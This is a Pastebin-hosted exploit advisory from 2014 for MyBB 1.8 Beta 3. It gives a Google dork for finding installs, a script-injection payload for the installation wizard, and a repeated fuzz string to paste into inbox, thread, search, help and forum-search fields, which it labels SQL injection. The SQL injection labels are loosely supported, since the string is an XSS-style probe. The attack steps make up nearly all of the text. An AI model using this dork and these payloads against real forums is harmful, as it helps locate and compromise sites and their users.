Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Title: MyBB 1.8 Beta 3 - Cross Site Scripting & SQL Injection
- # Google Dork: intext:"Powered By MyBB"
- # Date: 15.08.2014
- # Author: DemoLisH
- # Vendor Homepage: http://www.mybb.com/
- # Software Link: http://www.mybb.com/downloads
- # Version: 1.8 - Beta 3
- # Contact: onur@b3yaz.org
- ***************************************************
- a) Cross Site Scripting in Installation Wizard ( Board Configuration )
- Fill -Forum Name, Website Name, Website URL- with your code, for example - "><script>alert('DemoLisH')</script>localhost/install/index.php
- Now let's finish setup and go to the homepage.
- b) SQL Injection in Private Messages ( User CP )
- Go to -> Inbox, for example:localhost/private.php
- Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
- c) SQL Injection in Showthread
- Go to -> Show Thread, for example:localhost/showthread.php?tid=1
- Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
- d) SQL Injection in Search
- Go to -> Search, for example:localhost/search.php
- Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
- e) SQL Injection in Help Documents
- Go to -> Help Documents, for example:localhost/misc.php?action=help
- Search at the following code Keywords:<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
- f) SQL Injection in Forum Display
- Go to -> Forum Display, for example:localhost/forumdisplay.php?fid=2
- Search at the following code "Search this Forum":<foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload
- ***************************************************
- [~#~] Thanks To:Mugair, X-X-X, PoseidonKairos, DexmoD, Micky and all TurkeySecurity Members.
- # C5385FB67D35D5E0 1337day.com [2014-10-25] C072C10B3BF9C4C7 #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement